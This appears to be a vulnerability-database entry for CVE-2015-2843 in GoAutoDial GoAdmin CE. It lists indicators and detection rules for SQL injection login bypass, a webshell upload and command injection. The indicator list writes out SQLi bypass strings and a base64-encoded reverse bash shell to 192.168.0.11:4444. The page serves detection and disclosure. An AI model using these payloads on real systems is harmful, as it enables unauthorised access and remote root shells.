cbcvebase.
CVE-2015-2843
published 2015-05-12

CVE-2015-2843: Multiple SQL injection vulnerabilities in GoAutoDial GoAdmin CE before 3.3-1421902800 allow remote attackers to execute arbitrary SQL commands via the (1)…

PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
38.15%
98.4th percentile
Multiple SQL injection vulnerabilities in GoAutoDial GoAdmin CE before 3.3-1421902800 allow remote attackers to execute arbitrary SQL commands via the (1) user_name or (2) user_pass parameter in go_login.php or the PATH_INFO to (3) go_login/validate_credentials/admin/ or (4) index.php/go_site/go_get_user_info/.

Affected

2 ranges
VendorProductVersion rangeFixed in
goautodialgoadmin_ce
goautodialgoadmin_ce

Detection & IOCsextracted from sources · hover to see the quote

path/go_login.php
path/go_site.php
path/go_audiostore.php
url/go_login/validate_credentials/admin/' OR '1'='1
url/index.php/go_site/go_get_user_info/' or active='Y
url/index.php/go_site/cpanel/|| bash -c "eval `echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode`"
path/sounds/go_bogus.wav.php
filenamego_bogus.wav.php
path/changelog.txt
url/index.php/go_login/validate_credentials
url/index.php/go_site/go_get_user_info/' OR active='Y
url/index.php/go_site/cpanel/
  • Detect SQLi authentication bypass attempts targeting the user_pass POST parameter with OR-based payloads (e.g., ' or '1'='1) sent to /index.php/go_login/validate_credentials or go_login.php
  • Detect GET requests to /index.php/go_site/go_get_user_info/ containing SQL injection patterns such as single quotes or OR clauses in the PATH_INFO segment
  • Detect command injection attempts in the PATH_INFO of /index.php/go_site/cpanel/ containing pipe characters (||), bash, base64, or eval keywords
  • Detect file uploads to go_audiostore.php where the uploaded filename contains a double extension pattern matching *.wav.php (bypasses extension whitelist check)
  • Monitor web server access logs for requests to /sounds/ directory containing files prefixed with 'go_' and ending in .php, indicating successful webshell upload
  • Check for version string 1421902800 in changelog.txt to determine if the target is patched; absence of this string indicates a vulnerable version
  • Command injection payload is delivered as a base64-encoded reverse bash shell; detect URL-encoded pipe sequences (%7C%7C) followed by base64 strings in requests to /index.php/go_site/cpanel/
  • ·The vulnerable version range spans multiple build timestamps between 3.3-1406088000 and 3.3-1421902800; versions in between may also be vulnerable even if they received other updates
  • ·The SQLi authentication bypass assumes the default 'admin' user account has not been removed from the installation
  • ·Command injection executes with root privileges, making post-exploitation impact maximal on default GoAutoDial ISO builds
  • ·The Metasploit module defaults to SSL (port 443); detections should also cover non-SSL HTTP (port 80) deployments
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.